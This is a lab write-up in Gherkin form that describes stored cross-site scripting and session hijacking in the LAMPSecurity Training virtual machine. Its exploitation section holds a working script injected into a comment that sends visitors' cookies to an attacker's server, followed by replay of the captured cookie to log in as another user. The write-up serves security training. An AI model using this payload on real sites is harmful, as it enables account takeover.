## Version 1.4.1
## language: en

Feature:
  TOE:
    Lamp Security Training
  Location:
    http://192.168.1.80/content/lampsec-point-security-available
  CWE:
    CWE-287: Improper Authentication
  Rule:
    REQ.30: https://fluidattacks.com/web/en/rules/030/
    REQ.31: https://fluidattacks.com/web/en/rules/031/
  Goal:
    Compromise authentication mechanisms to access an user account
  Recommendation:
    Invalidate session id after log out

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali Linux      | 2019.1a     |
    | Firefox Quantum | 60.4.0esr   |
    | Nmap Scan       | 7.70        |
    | Tamper Data     | 0.3         |
  TOE information:
    Given I am accessing the site http://192.168.1.80:80
    And enter a php site that allows me to create an account
    And this site allows me to see different posts
    And the server is running Apache version 2.2.3
    And PHP version 5.1.6

  Scenario: Normal use case
    Given I access http://192.168.1.80:80
    Then I see the option to create a new account
    And I requested fields
    Then I can see there's a recent posts option
    And I see that the posts allow to add new comments

  Scenario: Static detection
    When I access http://192.168.1.80/comment/reply/27#comment-form
    Then I use Inspect element to check the code
    And I see in the following vulnerable lines of code
    """
    72 <form action="/comment/reply/27"  accept-charset="UTF-8"
    method="post" id="comment-form">
    75 <input type="text" maxlength="64" name="subject"
    id="edit-subject" size="60" value="" class="form-text" />
    79 <textarea cols="60" rows="15" name="comment" id="edit-comment"
    class="form-textarea resizable required"></textarea>
    """
    Then I can conclude the code does not validate the input

  Scenario: Dynamic detection
    Given I can add a new comment
    Then I write the next code to validate XSS vulnerability
    """
    <script>alert(document.cookie);</script>
    """
    Then I get the output [evidence](evidence1.png)
    And I can conclude the posts allow code injection
    Then I use Tamper Data to get my cookie
    And I logged out and made a new request to the page
    Then I use Tamper Data to change the cookie and gain access
    Then I can conclude the page is vulnerable to session hijacking

  Scenario: Exploitation
    Given the web page allows code injection
    And is vulnerable to session hijacking
    Then I start Apache service on Kali Linux
    Then I write the following script in the attacked web page
    """
    <script>
    var req = new XMLHttpRequest();
    var url = 'http://192.168.1.84/' + document.cookie;
    alert(url);
    req.open("GET", url);
    req.send();
    </script>
    """
    And save the reply as a comment of the post
    Then if another user reads the post the cookie will be captured
    And send it to the Kali Linux Apache server
    Then I execute the following command
    """
    tail -f /var/loh/apache2/access.log
    """
    And get the output [evidence](evidence2.png)
    Then I use Tamper Data to make a request with the cookie captured
    And I can see I am logged as Barbara
    Then I conclude I stole the session

  Scenario: Remediation
    When the method is called to reply a comment
    Then the form's input fields must be validated or sanitized
    And use in <form> and <input> the attributes type and pattern

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.6/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.1/10 (High) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.0/10 (High) - CR:H/IR:M/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2019-05-03
